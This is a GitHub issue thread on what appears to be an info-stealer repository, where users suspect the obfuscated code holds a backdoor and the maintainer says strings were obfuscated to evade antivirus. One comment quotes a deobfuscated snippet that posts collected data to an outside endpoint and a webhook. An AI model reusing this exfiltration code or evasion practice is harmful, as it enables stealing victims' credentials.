### ISSUE TITLE
Why do you put this on github if it is obfuscated?

### ISSUE THREAD

**Issue by supergarixd** [cankatx/cstealer#17]
This is very possibly a backdoor

**Comment by supergarixd** [comment]
Also:

![image](https://user-images.githubusercontent.com/97046121/224487558-bd6f8133-143c-41a6-85cb-efd22d399af1.png)


"Do you want to test the build" that is super suspitious, if you wanted to safely test it you would do it in a vm not in your machine where all your passwords can get stolen, your code is obfuscated, you are obviously hiding somenthing.

**Comment by cankatx** [comment]
I obfuscated some strings to bypass anti-virus detections you can edit the code if you think it's suspitious also most of the people trying to run the file by double clicking to main.py and can't see the errors. You can view the builder code and you can use them in CMD so you don't need to run builder.py to build the stub.

**Comment by CactusHamster** [comment]
@cankatx  I'd like to restate that antiviruses are likely not affected in the least by obfuscation.
@supergarixd I'm going to guess it's pretty safe, but obfuscation adds a more hacker-y feeling?

**Comment by supergarixd** [comment]
> I obfuscated some strings to bypass anti-virus detections you can edit the code if you think it's suspitious also most of the people trying to run the file by double clicking to main.py and can't see the errors. You can view the builder code and you can use them in CMD so you don't need to run builder.py to build the stub.

i cant, its obfuscated.

**Comment by supergarixd** [comment]
dont you have a not obfuscated version?

**Comment by supergarixd** [comment]
"most of the people trying to run the file by double clicking to main.py and can't see the errors." okay that is actually valid

**Comment by CactusHamster** [comment]
@supergarixd don't quote me on this but I think the original version that this repo was forked from was a bit obfuscated too

**Comment by Im4wasp** [comment]
> This is very possibly a backdoor

thats the obfuscated code lmao
idk why he did that
```py
# https://github.com/1337cnkobf1337/obf
urlopen(Request(gunes, data=dumps(data).encode(), headers=headers))
L04DUr118(h00k, data=dumps(data).encode(), headers=headers)
```

**Comment by CactusHamster** [comment]
@supergarixd the original code this came from is obfuscated as well. The 'author' used another repository for this, but did not fork it. If you'd like, however, a MITM proxy or wireshark, with a vm for safety, could help you figure out if there are malicious requests in the code.

**Comment by loTus04** [comment]
> @supergarixd the original code this came from is obfuscated as well. The 'author' used another repository for this, but did not fork it.

thats 🧢
im the original other lmaooo
its wasp

**Comment by cankatx** [comment]
> > @supergarixd the original code this came from is obfuscated as well. The 'author' used another repository for this, but did not fork it.
> 
> thats 🧢 im the original other lmaooo its wasp

Hello,

If you created w4sp it doesn't mean no one edit or replace it ever again. If you don't want anyone to use your code then don't share it or if it's leaked you should have made better protection. There is more than 30+ repos using w4sp source so you can't blame me about it also it's not w4sp anymore I added more features, fixed bugs, improvements, changed embeds etc. Thank you for your help to stealer community sorry I should add credits and given your name. I'm planning to release a big update you can be sure that your and wasp stealer name will be on "Credits" section. Have a nice day everyone.

For more contact telegram: @cankat

**Comment by loTus04** [comment]
also you can add my last repo to the next update, it will had a lot of value
